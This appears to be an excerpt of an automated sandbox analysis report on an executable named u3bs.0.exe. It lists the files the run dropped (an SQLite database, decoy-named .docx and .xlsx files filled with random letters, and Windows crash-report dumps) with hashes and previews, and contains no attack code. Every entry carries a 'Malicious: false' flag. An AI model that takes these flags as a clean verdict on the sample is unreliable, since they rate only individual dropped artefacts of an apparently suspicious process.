IKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\JEBKKEGDBFIIEBFHIEHCBKJJKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KATAXZVCPS.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\KZWFNRXYKI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\ProgramData\Microsoft\Windows\WER\Temp\WER86DC.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Apr 27 00:20:49 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	51594
Entropy (8bit):	2.8620815512379076
Encrypted:	false
SSDEEP:	384:EbqrL0yi17196lw9K0WE1nVlMrxkhLm3/88aNWyG:kGLnCDaw9ME1nVAxkhM/8pFG
MD5:	E2BCC04F38675E4C93FD76149F63E659
SHA1:	78764FC35CFCFE4330AD05A3F6AA611BA8BC3A35
SHA-256:	C06352A9F432D42D3E1196D6FB479879BCEC833825EECFB35ACBD5A5D8199269
SHA-512:	FC8CBF0A3C341F94DA2884CCD26A9767D13231FD68250FCC438B0EE9CFAD78D3EFFF6B409DBB153FFE129F0163C1C83A25A77FC0139A46FC42726769085B41EF
Malicious:	false
Preview:	MDMP..a..... ........D,f............4...........H...H............#...........A..........`.......8...........T............9...............)...........+..............................................................................eJ...... ,......GenuineIntel............T...........oD,f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F88.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8340
Entropy (8bit):	3.6982213073557104
Encrypted:	false
SSDEEP:	192:R6l7wVeJfn6d6Y9bSUdbgmfa3pDA89bAQsf7gm:R6lXJv6d6YRSUdbgmfavAjfZ
MD5:	AA610E6AB82978A1B7069D6D30E529D6
SHA1:	A4F19D8CD2D6C2DE8D41A2561A0BA0E63084DAD9
SHA-256:	3C9A720AEBDD562C6447297FCB460CC879D3E15CB131632D5ED93DE93159C510
SHA-512:	CD590EACE7919E62946581EB66564C0CED379059E1CDD4A3DF54BB9EF608519213B560315F08BB0809F22F9D524A17D605BD4F90BBA3B25F421D70ADF57FB018
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FC7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.461861086165045
Encrypted:	false
SSDEEP:	48:cvIwWl8zsaNJg77aI98nWpW8VYlwYm8M4JqbFg+q8sWt/o0GMd:uIjfeI7qW7VyJdst/9GMd
MD5:	5DAF6534875B3C12A2F7F4291FB6297F
SHA1:	82CC66F040D70E50C36C91C2AEC96AB6350A32BD
SHA-256:	5A1697755E081C951BAF19E89DDC1994413F04D4D6FE2D9DD8B76D0CB9CE4604
SHA-512:	695952FFB7D735D83A1B966634E888E45830AC4C366471C7278810194AB1D19E9F6EFE10A2E2CF243617210B3735E3A95144431F064AE2DA5EE104E37A00637E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297563" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA541.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Apr 27 00:20:55 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	62506
Entropy (8bit):	2.7252612363808746
Encrypted:	false
SSDEEP:	384:BqZGFwFZOgEUIEdMY+5nbjpXAxYX+3ofxFy:HFw+gEvbYGn3pXqY7xF
MD5:	B550581A037E40835023FE7E64FB337D
SHA1:	4F83F9F47D089962C3E08D83DAEA723408E1BE46
SHA-256:	B394D7655CE3E47867DFBA0DA50DD0D9A62A6BD5D300CED9F505878EA7623E15
SHA-512:	7A4FD2E11179239430D99E2ECA7249EE58454C79F4E7C9C0280F1EE5343923039179711BA5E887419BA710791142D596012A742F9AD4D562EA912E30B0347211
Malicious:	false
Preview:	MDMP..a..... ........D,f............4............ ..<...........v9..........T.......8...........T............[.............((.........................................................................................eJ.......*......GenuineIntel............T...........tD,f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA775.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.696608315443663
Encrypted:	false
SSDEEP:	192:R6l7wVeJOq6fx6YfG61gmfsGpDG89b9bsfp5Svfm:R6lXJj6fx6Y+61gmfsU9gfpF
MD5:	5F87D5EAFB8FDEC8315D380DE36CB063
SHA1:	059304F22F13A9CF9914363490BD65485B285EA7
SHA-256:	0CA872919D1C9A5FA2C2A8D92296E4F6F48385BD760570EDC37C79E855B2796C
SHA-512:	A8396ADBB34035820E47510F85E988323573C2ADB760F7931AB229A92C7F20E9EF83DAFF333FD5D57F1E786E091CC7E124CF6B4F288DECE19B867881BFB2C957
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA7F3.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.434336293524435
Encrypted:	false
SSDEEP:	48:cvIwWl8zsaNJg77aI98nWpW8VYuYm8M4JNmHoF2r+q8vMTcq8E9d:uIjfeI7qW7VqJOribE9d
MD5:	ADBC0383EFE7FCC6DAC72CF4FFF9C7E7
SHA1:	DF9E21C0F96B53194C8C5E1DB81B3A69C87D7913
SHA-256:	F190791D0CD3BF046AEB0DC9CCD6CC20CF7218A6397324D6ACF89705E829F805
SHA-512:	64A6634E5E944265B37AAA46D3B73D642885B95D9B2D749FE5CF80417725275F6832A66B5ED54E4F185A81930AB20ACE08BC1A18A207F954D47F67921AB07678
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297563" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\NWCXBPIUYI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696724055101702
Encrypted:	false
SSDEEP:	24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
MD5:	1FFF6A639C738561CDC01BD436BA77C1
SHA1:	BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
SHA-256:	C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
SHA-512:	65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
Malicious:	false
Preview:	NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC

C:\ProgramData\NWTVCDUMOB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\ProgramData\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\YPSIACHYXW.xlsx

Download File

